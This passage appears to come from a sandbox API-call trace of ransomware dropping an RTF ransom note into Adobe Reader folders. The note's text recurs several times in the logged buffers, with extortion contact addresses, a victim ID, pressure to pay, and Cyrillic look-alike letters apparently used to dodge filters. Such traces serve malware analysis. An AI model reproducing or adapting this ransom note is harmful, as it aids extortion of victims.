d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.904] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.905] CloseHandle (hObject=0x1e4) returned 1 [0064.905] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ukr\\bg85_info.rtf")) returned 0xffffffff [0064.905] GetLastError () returned 0x2 [0064.905] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\UKR\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ukr\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0064.906] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.906] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.906] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n 